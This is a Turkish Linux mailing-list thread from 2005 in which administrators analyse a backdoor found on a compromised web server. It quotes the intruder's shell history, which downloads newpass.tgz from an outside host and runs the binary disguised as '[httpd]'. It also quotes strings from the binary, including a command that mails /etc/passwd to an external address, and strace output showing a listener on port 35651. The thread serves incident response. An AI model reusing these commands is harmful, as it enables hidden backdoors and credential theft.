Re: [Linux-sunucu] r0nin

From: Nihat Ciddi (nakof@zig.gen.tr)
Date: Mon 18 Apr 2005 - 19:03:52 EEST

• Previous message: S.Çağlar Onur: "Re: [Linux-sunucu] r0nin"
• In reply to: S.Çağlar Onur: "Re: [Linux-sunucu] r0nin"
• Next in thread: The RED: "Re: [Linux-sunucu] r0nin"

selam,

Bi ce$it backdoor'a benziyo

newpass'i systrace ettigimizde:

...
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
bind(3, {sa_family=AF_INET, sin_port=htons(35651),
sin_addr=inet_addr("0.0.0.0")}, 16) = 0
listen(3, 5)
...

35651. tcp port'unu kullaniyomu$.

On Mon, 2005-04-18 at 17:37 +0300, S.Çağlar Onur wrote:
> Selamlar;
>
> Bence hemen makinanın ethernet kablosunu çekip, dosyalarınızı
> yedeklemeye başlayın. Birileri sisteminizde nağralar atıyor şu an.
>
> $ wget wget powerlock.home.ro/newpass.tgz
>
> ile bahsi geçen dosyayı alırsanız ve içinden çıkan newpass binary'sine
>
> $ strings newpass
>
> komutu ile bakarsanız,
> ...
> pqrstuvwxyzabcde
> 0123456789abcdef
> /dev/ptmx
> /dev/pty
> /dev/tty
> care e parola
> socket
> bind
> listen
> make by alin777 email alin777@alin777.net
> cat /etc/passwd | mail alin777@alin777.net
> /dev/null
> HOME=%s
> Can't fork pty, bye!
> Make by alin777.Mail alin777@alin777.net
> Enter a password:
> parola ff corecta
> parola ff proasta
> puzzleme
> /bin/sh
>
> benzeri bir sürü satır göreceksiniz. socket, bind ve listen'dan bunun
> bir daemon olduğu ve arada şifreleri, etc/password gibi dosyaları
> alin777@alin777.net gibi bir adrese attığını görebilirsiniz sanırım.
>
> Zaten .bash_history'e göre hali hazırda "[http]" isminde bir process
> sisteminizde huzur içinde çalışıyor.
>
> Gerekli dosyaları yedekleyip, temiz olduklarından emin olup sistemi
> yeniden kurmaktan başka bir yol sizin için göremiyorum.
>
> Pzt, 2005-04-18 tarihinde 13:48 +0300 saatinde, The RED yazdı:
> > /var/tmp dizininde .bash_history oluÅŸmuÅŸ. Sunucudaki exploit bir shell
> > hesabı açıyor herhalde ve ev dizinini /var/tmp olarak veriyor. Normalde
> > hiçbir kullanıcının shell izni yok. (sunucu web sunucu)
> > /var/tmp/.bash_history dosyasının içeriği:
> >
> > e
> > w
> > /sbin/ifconfig
> > w
> > cd /var/tmp/.hu
> > cd /var/tmp
> > mkdir .hu
> > cd .hu
> > wget powerlock.home.ro/newpas.tgz
> > wget powerlock.home.ro/newpass.tgz
> > tar zxvf newpass.tgz
> > mv newpass [httpd]
> > export PATH="."
> > [httpd]
>
> Saygılar
> _______________________________________________
> Linux-sunucu mailing list
> Linux-sunucu@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-sunucu

• application/pgp-signature attachment: This is a digitally signed message part

_______________________________________________
Linux-sunucu mailing list
Linux-sunucu@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-sunucu

• Previous message: S.Çağlar Onur: "Re: [Linux-sunucu] r0nin"
• In reply to: S.Çağlar Onur: "Re: [Linux-sunucu] r0nin"
• Next in thread: The RED: "Re: [Linux-sunucu] r0nin"